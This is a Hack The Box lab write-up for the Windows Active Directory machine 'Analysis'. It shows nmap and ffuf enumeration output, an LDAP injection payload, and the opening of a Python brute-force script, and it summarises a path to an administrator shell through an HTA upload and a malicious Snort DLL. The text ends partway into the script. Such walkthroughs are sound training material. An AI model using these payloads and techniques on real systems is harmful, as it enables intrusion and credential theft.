https://mgarrity.comGatsbyJSThu, 26 Feb 2026 00:46:53 GMThttps://mgarrity.com/hack-the-box-analysis/https://mgarrity.com/hack-the-box-analysis/Sun, 15 Jun 2025 00:00:00 GMT<p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/b1b924a7fcf71ca5b3a3be3a1a1e48b5/3b67f/analysis.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 43.67088607594937%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA+0lEQVR42mMQkdX+jwuLArGQnM5/bnnd/4KyOmC+CAHMgM8wXjnd/9JS6v/1hOT+y0iqg/mi5BgI0sQH1Gwppvi/UE7jf62F8/8Sec3/ZuJKYHFRUg0EeVNGWuN/gYTy/9C2yf9tT57/H9o763+BpPJ/KaA4SJ5oA8Feldf7bwB0XY6y8X+bNTv/C1y+/F9/w97/GWrm/w2B4nzyuF2J04WyMpr/s0Tk/ltFF/73WLzhv01y5f9soJdBLhQmxYUgLAbEPMCwsgB6OUNI5n+Riv7/LFF5cBjykhOGiFgGhiXQpQZiSv8lgTQfubGMcKkW2Hv8wDCDuZxQOgQAREEC3MIewSYAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Analysis" title="" src="/static/b1b924a7fcf71ca5b3a3be3a1a1e48b5/50637/analysis.png" srcset="/static/b1b924a7fcf71ca5b3a3be3a1a1e48b5/dda05/analysis.png 158w, /static/b1b924a7fcf71ca5b3a3be3a1a1e48b5/679a3/analysis.png 315w, /static/b1b924a7fcf71ca5b3a3be3a1a1e48b5/50637/analysis.png 630w, /static/b1b924a7fcf71ca5b3a3be3a1a1e48b5/fddb0/analysis.png 945w, /static/b1b924a7fcf71ca5b3a3be3a1a1e48b5/3b67f/analysis.png 1232w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Analysis is a Windows machine running Active Directory. An internal subdomain hosts a webpage vulnerable to LDAP injection, which can be exploited to brute force LDAP attributes, revealing a password in the description field of the <code class="language-text">technician</code> user. These credentials grant access to the analysis dashboard, where uploading an HTA file enables command execution and results in a shell. Additional credentials for the <code class="language-text">jdoe</code> user can be discovered in a log file on the web server, allowing for a WinRM shell. Further enumeration shows that Snort is running on the system. By uploading a custom DLL to the <code class="language-text">dynamicpreprocessor</code> directory, it’s possible to execute code with the privileges of the Snort service, in this case the <code class="language-text">administrator</code>.</p> <p><code class="language-text">nmap</code> scan:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Analysis] └─$ nmap -sC -sV -oA nmap/output 10.10.11.250 Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-06-12 15:18 EDT Nmap scan report for analysis.htb (10.10.11.250) Host is up (0.053s latency). Not shown: 987 closed tcp ports (conn-refused) PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Site doesn't have a title (text/html). | http-methods: |_ Potentially risky methods: TRACE | http-server-header: | Microsoft-HTTPAPI/2.0 |_ Microsoft-IIS/10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-06-12 18:30:53Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: analysis.htb0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 3306/tcp open mysql MySQL (unauthorized) Service Info: Host: DC-ANALYSIS; OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: -47m26s | smb2-security-mode: | 3:1:1: |_ Message signing enabled and required | smb2-time: | date: 2025-06-12T18:30:57 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.24 seconds</code></pre></div> <p>After adding <code class="language-text">analysis.htb</code> and <code class="language-text">DC-ANALYSIS.analysis.htb</code> to <code class="language-text">/etc/hosts</code>, I visited the webpage running on port 80:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/691a9c179d60f99b3ef5ac9cce8e023f/c0d05/analysis-webpage.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 81.0126582278481%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAQCAYAAAAWGF8bAAAACXBIWXMAAAsTAAALEwEAmpwYAAAEXUlEQVR42jWUe0yTZxSHP0CG4pjiRLFAq6W0BWwRbCkCjotcFVQELUWriDhvIMxOEEVQDMtQpygzC2C9XzBGZnCoLFPMTNDBRjdwW8bM0BmM2VymLmqWbD57W7M/Tk7yfed93t+5vZIsSEmQUo0uIgKDKY7I6FnIg9UoQ7RMFT5AocRfxAQqtYTp9YQLC9aEodSEogjWIBdnnT5gqspl0mhtErLEhbjLDYzWzcE7OgvPGelI+jTeTFjEhKRc/FMsvJVTRmZ1PeHmIiakLCEg04JvfA5jTdn4zJqPly4VT8GSJsbMxy9uAdLkmXiEJjMqZiF+SUtY82ED3Y5rdA7eYIHdTvzBZswth3nv+GHyttXim1bA2Nl5vGHIxss4H0kjYIpYJFlCDt66FKQAE+7KeKTIeXx89ihwnxd/3WHvpydIb22h5WYnv/85yD//Dot/w9Q2H8LdmC2AWXhok5GmxSHJTUie6gTcAqNxVyci+RuxVtXwWBzMb2zEuL2O6IaPqO+6wJPH3zDy6GuevxwSwF959WqYHFsVkjoZD3kMbk4xToXjRboumJAsi82m99urxG+pZUxhOcZ9B8loO83Fu308fzHEb08GGHxwi8H7Pa4Mum5eFMriGSUEubmgQqVXaBIeTqC4SZduZsvJVlQVO5hWWkV0YxMZR+z0Pxqg85deTvZdYf/1c5zv62D4wW2huI+Qd0T9fCPwcNbQqVIKMuEbmsCuylIyV6wlrmqHANaiWG1DZqvhSM9l/ng2wBlHFxpRjp0dJ7n3tJ/WS6e5N/IVeUVr0BqSeUOUTpoyUwBlUXhNi+V4xTpKKiuoaz2EdnMNk4o3EbK9nv3dHfz98nsePnXQ1t/Jvq4zlB1rYnf7ETq72ygoLObo1vV4yma8bookM+AXmkhHQwVRqYv4+e6XdN66ROzODwi2bUcuUl/Vcoi27naavzjPROtayu0H6LlzlYEfr6FOzqWqIB+vSdOFwigBDEli9cYSMQnt2DZt4JNTzbx85uDU9fMEWEuYWFjGGMt6wmp2Uddmp+XKWUYe9jLw3WfUNTdiXlHE/StNqGLSX4/O5FnzOLN3K/TbOdtYTeKyIhx3Pqen/zLajZXINwmV79rQlla6ZtIx1C06PMKJ9qP4GOdSXriS3oPb2F1rwztSQN82pFG0chXdB6oYPNeA9/QUZucWcttxmbQ9e4is3oWhvoHJyzbQdOEEQ8M9/PDTDTKsq8VWRFNnXcrxsmLyzUsZF5MldjksiSmRc1hutWJv2ExgbKbYGiMpK4rJrK1BVfI+EZXVhK0rR1e0nsB5FnwixWYoTASbUjlWW4rVYkEdN1eMjUjZPdDEaHkU45MzGJOYiV96FprFFjR5BWhzRWCOmfDFBejzrWiFV+UsQW9ZTkiu2RU7LjULn4R0PPz1uDmbMiVIhfMJk6vUTBVPUlCIxmUKjRa5WosyXId2RhQaYarpete3/+MCxRmFM1ZYQFAw/oFK/gPTLKcXE0qOFAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="Analysis webpage" title="" src="/static/691a9c179d60f99b3ef5ac9cce8e023f/50637/analysis-webpage.png" srcset="/static/691a9c179d60f99b3ef5ac9cce8e023f/dda05/analysis-webpage.png 158w, /static/691a9c179d60f99b3ef5ac9cce8e023f/679a3/analysis-webpage.png 315w, /static/691a9c179d60f99b3ef5ac9cce8e023f/50637/analysis-webpage.png 630w, /static/691a9c179d60f99b3ef5ac9cce8e023f/fddb0/analysis-webpage.png 945w, /static/691a9c179d60f99b3ef5ac9cce8e023f/c0d05/analysis-webpage.png 1166w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>There wasn’t much to go off of on the webpage, so I used <code class="language-text">ffuf</code> to enumerate subdomains and found the <code class="language-text">internal</code> subdomain:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Analysis] └─$ ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://10.10.11.250 -H "Host: FUZZ.analysis.htb" &lt;...snip...> internal [Status: 403, Size: 1268, Words: 74, Lines: 30, Duration: 56ms] :: Progress: [4989/4989] :: Job [1/1] :: 415 req/sec :: Duration: [0:00:13] :: Errors: 0 ::</code></pre></div> <p>I added <code class="language-text">internal.analysis.htb</code> to <code class="language-text">/etc/hosts</code> and visited the page, which resulted in a 403:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/16ee83adf56b5f75b9d5ed3e98dcadde/c4923/internal-analysis-403.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 39.24050632911392%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABdUlEQVR42q3NyU7CUBiG4d6AOC416sKdQ6IuNI5MLQg4Rg2EeENSXepOS/SOjAsjCghUYkiggxqGvJ7WShy2Nnnyff/p31Opt2+I4ZFxlpYDxOK7xBJ7bIhUolvCNqNjE/T4+vH1Dnb1+AZczre/SYFglKWVIGvrCiE5znogwppfwe+X2dneJ7G5SzAUYXZuwTU3vyh+7mdhcZXpmXkmp2Z/kA4PU6TTRySTaVKpNAcHSWQlSjisEI8nxIVbxGIJwnLEJQuR6AaK2AmF5D+k8/Mzrq+u0TSNC+0SLZtFVVXU01MyJyoZ0d3MZFA9bnd2PCdOOufHx0ivb+9Yj3mM+xyN21vqNzfYhQJ2LoeVz2Pe3WE/PNBqt2k2mzRbrc/0tLy5Ld47j2RZFrWXF57LZfRikUq+QFnk89MTZacLuui6rlOpVATd7aVSyZ2r1SpFsV+v1+l0OkhOMcSl5hfb9rr9YzYMo8s0za7v541GA6lWq/GfPgBfWMjPwnQZIQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="internal.analysis.htb 403" title="" src="/static/16ee83adf56b5f75b9d5ed3e98dcadde/50637/internal-analysis-403.png" srcset="/static/16ee83adf56b5f75b9d5ed3e98dcadde/dda05/internal-analysis-403.png 158w, /static/16ee83adf56b5f75b9d5ed3e98dcadde/679a3/internal-analysis-403.png 315w, /static/16ee83adf56b5f75b9d5ed3e98dcadde/50637/internal-analysis-403.png 630w, /static/16ee83adf56b5f75b9d5ed3e98dcadde/c4923/internal-analysis-403.png 734w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Next, I enumerated subdirectories for <code class="language-text">internal.analysis.htb</code>:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Analysis] └─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://internal.analysis.htb/FUZZ &lt;...snip...> dashboard [Status: 301, Size: 174, Words: 9, Lines: 2, Duration: 51ms] employees [Status: 301, Size: 174, Words: 9, Lines: 2, Duration: 67ms] users [Status: 301, Size: 170, Words: 9, Lines: 2, Duration: 61ms] :: Progress: [4734/4734] :: Job [1/1] :: 732 req/sec :: Duration: [0:00:06] :: Errors: 0 ::</code></pre></div> <p>Attempting to visit <code class="language-text">/dashboard</code> resulted in another 403:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/8413018677a27475be529956a6223c6d/c4923/internal-analysis-dashboard-403.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 38.60759493670886%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAICAYAAAD5nd/tAAAACXBIWXMAAAsTAAALEwEAmpwYAAABSElEQVR42o2Ny07CABBF+wWCURNd+AW6oBhEFHxBaWkLFSSxRox/QruTvSTAd+nORyh9hYUkoKhg5DpUgRhDYJKTuXdmcodZXVtHgA1BzuQhpXPEKUQpC1HOIRSOwudf/seCb+mP9y+ujGF2o3HsxRJI8GkcHqdwFBcRO+AgiydQlDx4IY1tCg4Ew2C3djwdiewjTD1InqX5xiY7hilcXkFVC1DPCzhTLyDLCuKJJCRRQiajUGgWgiCC43hwSZ4epDyf5FPkBY/h/QimWquhUqviplz2+nWphKKuQdN1FDXNQ5uBTrcjmI9mE2+PT3iv1/F6e4eeaeLTMNBvNAgTvfsHfHW78GowwKxiXjoduI4D17bhUJhFQY411BbsX+86LmzamzRzXReWZXl6OHNoZxj0vN//CWy325jQmaLnh2m1WpjwPEXPzzcnvcaNu0YGVwAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="/dashboard 403" title="" src="/static/8413018677a27475be529956a6223c6d/50637/internal-analysis-dashboard-403.png" srcset="/static/8413018677a27475be529956a6223c6d/dda05/internal-analysis-dashboard-403.png 158w, /static/8413018677a27475be529956a6223c6d/679a3/internal-analysis-dashboard-403.png 315w, /static/8413018677a27475be529956a6223c6d/50637/internal-analysis-dashboard-403.png 630w, /static/8413018677a27475be529956a6223c6d/c4923/internal-analysis-dashboard-403.png 734w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Visiting both <code class="language-text">/employees</code> and <code class="language-text">/users</code> resulted in a 404:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/7fcd1fb2740d48157946ce378b7c5ccd/84c27/internal-analysis-404.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 23.417721518987342%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA0ElEQVR42o2N3QqCMBiGd4GThG4ikn7urjoymVBdhs5phagDQUPt7dtqHXTUwcP78429bLPdIlivsQgCLFcr+PM5+GwGz/ct3PPAOf8bdoljnMMQJ8JotNshOhwQ7ffWi+MRMb0RQnwx2XXOu8weZYk+y/AoCvR5ji5J0CuFzkB+aFtMzyfGccQwDFYd0zR9O6es1hrqdoO6XpHf79ZL+jyjbFDkpZSQNKpoJCNN09RS0C2hUdMZNXdWVRWaukbTNG8lNHnLp9c0arBvfvKvvgCvcEwNDsPV8QAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="internal.analysis.htb 404" title="" src="/static/7fcd1fb2740d48157946ce378b7c5ccd/50637/internal-analysis-404.png" srcset="/static/7fcd1fb2740d48157946ce378b7c5ccd/dda05/internal-analysis-404.png 158w, /static/7fcd1fb2740d48157946ce378b7c5ccd/679a3/internal-analysis-404.png 315w, /static/7fcd1fb2740d48157946ce378b7c5ccd/50637/internal-analysis-404.png 630w, /static/7fcd1fb2740d48157946ce378b7c5ccd/84c27/internal-analysis-404.png 804w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Since the server was running IIS, the site was potentially using PHP, so I enumerated pages in <code class="language-text">/dashboard</code> with the <code class="language-text">.php</code> extension:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Analysis] └─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/common.txt -u http://internal.analysis.htb/dashboard/FUZZ.php &lt;...snip...> Index [Status: 200, Size: 38, Words: 3, Lines: 5, Duration: 83ms] details [Status: 200, Size: 35, Words: 3, Lines: 5, Duration: 61ms] emergency [Status: 200, Size: 35, Words: 3, Lines: 5, Duration: 73ms] form [Status: 200, Size: 35, Words: 3, Lines: 5, Duration: 88ms] index [Status: 200, Size: 38, Words: 3, Lines: 5, Duration: 63ms] logout [Status: 302, Size: 3, Words: 1, Lines: 1, Duration: 76ms] tickets [Status: 200, Size: 35, Words: 3, Lines: 5, Duration: 48ms] upload [Status: 200, Size: 0, Words: 1, Lines: 1, Duration: 52ms] :: Progress: [4734/4734] :: Job [1/1] :: 403 req/sec :: Duration: [0:00:11] :: Errors: 0 ::</code></pre></div> <p>All of the pages were blank due to authentication being required, except for one. Visiting <code class="language-text">/dashboard/logout.php</code> redirected to <code class="language-text">/employees/login.php</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/be43c02f5e22480b4c4b2b69ffe87d6b/7c474/internal-panel-login.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 35.44303797468354%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA20lEQVR42pWO20rDUBBF8x1W25xGm1TFJx8KUpCC6Isf35ykubT+ggEDSXM5Z5lE1DYYsBsWsxlmNttw5nc8LFc8Pb/yuHphsVhyNbtmPLEwxQwxtZmYFhdji7ORecToXCCEzfRyju3c4tzcY0TRFs/f4EqPtSsJgpB4u8Nt/PoAfxMgPf8L+UsYRg0xcbwjarzBgMqyJMsy8jynqir+K0MpRZ9WaZqSJEkX1u7quj7ir7+WwYbFPqcsCrTW3WE7Dxls2F9838r3jLePfedVL+ykwJ+GtaZSmlP1CZwz79zi9ZA/AAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="internal panel login" title="" src="/static/be43c02f5e22480b4c4b2b69ffe87d6b/50637/internal-panel-login.png" srcset="/static/be43c02f5e22480b4c4b2b69ffe87d6b/dda05/internal-panel-login.png 158w, /static/be43c02f5e22480b4c4b2b69ffe87d6b/679a3/internal-panel-login.png 315w, /static/be43c02f5e22480b4c4b2b69ffe87d6b/50637/internal-panel-login.png 630w, /static/be43c02f5e22480b4c4b2b69ffe87d6b/fddb0/internal-panel-login.png 945w, /static/be43c02f5e22480b4c4b2b69ffe87d6b/f46b1/internal-panel-login.png 1260w, /static/be43c02f5e22480b4c4b2b69ffe87d6b/7c474/internal-panel-login.png 1329w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>I didn't have any credentials and SQL injection didn't seem to work on the form, so next I visited <code class="language-text">/users</code> which showed a "missing parameter" message:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/2e6121a0cc60d149c759b04889bcde50/a1ee8/internal-analysis-users-list.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 24.68354430379747%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA3klEQVR42qXMzU7CUBCG4XMDFKMuNbLQoEK1SCryY20qGnfauFBvUgzEBW1PQQjX1Jakfe05xpi4ZZInM/MlM6JibLO3X6N/7eE/v/Hov/Dkv+qutO0eleoOxj/qzjD+9urWriYGzpCrnkune4Pj3mN3nPLJAKt1iefe4d0+lPmQRrNF/djUmuYFlmVjnrX1fnJ6zuFRg4NaHTEZfzL6mPA+GmtBGBPPFoSh5Gu+YLlcaVE005kSyRgp52UW/2RlDwLJdBohsiwjSRLSNGW9ziiKgk1K/A7qkZLn+Ua+AVAKG0FlwN0oAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="internal analysis users list" title="" src="/static/2e6121a0cc60d149c759b04889bcde50/50637/internal-analysis-users-list.png" srcset="/static/2e6121a0cc60d149c759b04889bcde50/dda05/internal-analysis-users-list.png 158w, /static/2e6121a0cc60d149c759b04889bcde50/679a3/internal-analysis-users-list.png 315w, /static/2e6121a0cc60d149c759b04889bcde50/50637/internal-analysis-users-list.png 630w, /static/2e6121a0cc60d149c759b04889bcde50/a1ee8/internal-analysis-users-list.png 706w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Fuzzing parameter names using <code class="language-text">ffuf</code> revealed the <code class="language-text">name</code> parameter:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">┌──(kali㉿kali)-[~/Desktop/HTB/Analysis] └─$ ffuf -w /usr/share/wordlists/seclists/Discovery/Web-Content/burp-parameter-names.txt -u http://internal.analysis.htb/users/list.php?FUZZ=test -fs 17 &lt;...snip...> name [Status: 200, Size: 406, Words: 11, Lines: 1, Duration: 61ms] :: Progress: [6453/6453] :: Job [1/1] :: 763 req/sec :: Duration: [0:00:08] :: Errors: 0 ::</code></pre></div> <p>Visiting <code class="language-text">/users?name=test</code> showed a table for listing various user information:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/6a69a0ceddbd5317a4c804549ef702b9/96430/internal-analysis-users-list-test.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 32.911392405063296%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABAklEQVR42q2PzUrDQBSF5wFsxVroVgRfQjdaYhF1p5jW1Jqx2FoqKj5eXiJ/e2vJIiSTbAOBJMfMDSNUXIkXPs6cc+8Mc9ne/gGO+2fQBpfoa+fQTi9weHSCTreHVrtDtLd3CeVVttXaIRrfJZjJ5+DTp5oFJuYM04c5Xl/esXx+g2GYGI7uYIw5TP5Yq/QTjG4bbnQDV9dD6PoY93xG77CP1Qqf6zWCIICsqqpq8KcqyxIsTVMIIRBFEelvJEmCOI5JhYg3MnWW97MsA7MsC77vE67rwvM8UonjOORt2/5Whewp5KzMwjAEy/McRVHQqvLLzcqbyFytpLzKfvYZ/rm+ANq+wtbRXhwIAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="internal analysis users list test" title="" src="/static/6a69a0ceddbd5317a4c804549ef702b9/50637/internal-analysis-users-list-test.png" srcset="/static/6a69a0ceddbd5317a4c804549ef702b9/dda05/internal-analysis-users-list-test.png 158w, /static/6a69a0ceddbd5317a4c804549ef702b9/679a3/internal-analysis-users-list-test.png 315w, /static/6a69a0ceddbd5317a4c804549ef702b9/50637/internal-analysis-users-list-test.png 630w, /static/6a69a0ceddbd5317a4c804549ef702b9/96430/internal-analysis-users-list-test.png 933w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Using the wildcard character (<code class="language-text">*</code>) listed one of the users:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/e14db4b6d257564b06da45e88c349146/724ba/internal-analysis-users-list-wildcard.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 31.645569620253163%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA/0lEQVR42q2Mu1LCUBCGzwvILagZGyutsLHTArDBtxKQnCAhXIZGx4fK5FqEdLk26JHkAX456+AL6M58s//+/+4y9eISV9cddPuP6PYGuLt/QK8/QOfmFkpbRb1xSrQUFc3WOelG84z6SU0havU25RLGdQPDEcfTcILRmINP51iYa7y+vWO13kDjL+D6DMZ8iZmxoFk/zNIbP/PDjYaJNoVhrmAuN2BCCOz3XxDiE1VV4a/FttsIvu8jiiIEQQDHceC6LjzPI6T+wfv1jjtHpGfbNna7DzD5xLIsxHGMLMvoaRiGpNM0RZ7n1IuiIJ0kCWVyX3pSS2RWliUY/rm+AZdbfD6fVZ9VAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="internal analysis users list wildcard" title="" src="/static/e14db4b6d257564b06da45e88c349146/50637/internal-analysis-users-list-wildcard.png" srcset="/static/e14db4b6d257564b06da45e88c349146/dda05/internal-analysis-users-list-wildcard.png 158w, /static/e14db4b6d257564b06da45e88c349146/679a3/internal-analysis-users-list-wildcard.png 315w, /static/e14db4b6d257564b06da45e88c349146/50637/internal-analysis-users-list-wildcard.png 630w, /static/e14db4b6d257564b06da45e88c349146/724ba/internal-analysis-users-list-wildcard.png 935w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The site was most likely pulling user information from LDAP, so I tested for LDAP injection with the following value:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">technician)(givenName=technician</code></pre></div> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/68577bdd07e4839bed7aca699e10b3df/64b8a/internal-analysis-users-list-ldap-injection.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 27.848101265822784%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA2ElEQVR42q2MuwqCYBTHvwfIL6i2lh6gpsYgKqKhp8nbZ5QODQ49ng5eQB28gQiubv7TT6yGxg78OOd/4ZDlao3D8Yzt7sTZbPaYzxeg4ylGdMKh4xmETgu9fm/6pVsEOgURJQ0XUYOi6WBXHfebAdN8Qjcera9AkhmYdoPKrhAltYW1vtrf8nAzrlV2BynLEnmeo65r/GNIEASIogi+78N1XXie95M+d3hnoPMdx0FRFPxZ0zQglmUhTVOEYQjbtvlOkoTT+R1ZliGO4zdDNvSqqvo8xJ/nBRHlecSjlTXBAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="internal analysis users list LDAP injection" title="" src="/static/68577bdd07e4839bed7aca699e10b3df/50637/internal-analysis-users-list-ldap-injection.png" srcset="/static/68577bdd07e4839bed7aca699e10b3df/dda05/internal-analysis-users-list-ldap-injection.png 158w, /static/68577bdd07e4839bed7aca699e10b3df/679a3/internal-analysis-users-list-ldap-injection.png 315w, /static/68577bdd07e4839bed7aca699e10b3df/50637/internal-analysis-users-list-ldap-injection.png 630w, /static/68577bdd07e4839bed7aca699e10b3df/fddb0/internal-analysis-users-list-ldap-injection.png 945w, /static/68577bdd07e4839bed7aca699e10b3df/64b8a/internal-analysis-users-list-ldap-injection.png 1035w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>As shown above, the username was returned without an error (in this case, "CONTACT_" in the Username field would indicate an error), confirming the page was vulnerable to LDAP injection. Using the following Python script, I was able to brute force the values of LDAP fields:</p> <div class="gatsby-highlight" data-language="python"><pre class="language-python"><code class="language-python"><span class="token comment">#!/usr/bin/python3</span> <span class="token keyword">import</span> requests <span class="token keyword">import</span> string <span class="token keyword">import</span> sys TARGET_HOST <span class="token operator">=</span> <span class="token string">"internal.analysis.htb"</span> BASE_URL <span class="token operator">=</span> <span class="token string-interpolation"><span class="token string">f"http://</span><span class="token interpolation"><span class="token punctuation">{</span>TARGET_HOST<span class="token punctuation">}</span></span><span class="token string">/users/list.php"</span></span> 